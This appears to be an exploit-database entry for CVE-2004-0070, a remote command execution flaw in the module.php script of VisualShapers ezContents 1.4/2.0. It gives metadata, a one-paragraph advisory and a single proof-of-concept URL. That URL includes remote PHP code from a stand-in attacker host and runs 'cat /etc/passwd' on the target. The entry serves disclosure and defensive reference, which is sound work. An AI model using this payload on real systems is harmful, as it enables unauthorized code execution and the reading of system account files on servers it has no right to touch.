VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution

Author: Zero X
type: webapps
platform: php
port: 
date_added: 2004-01-10 
date_updated: 2012-12-20 
verified: 1 
codes: CVE-2004-0070;OSVDB-6878 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/9396/info

A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems.

http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd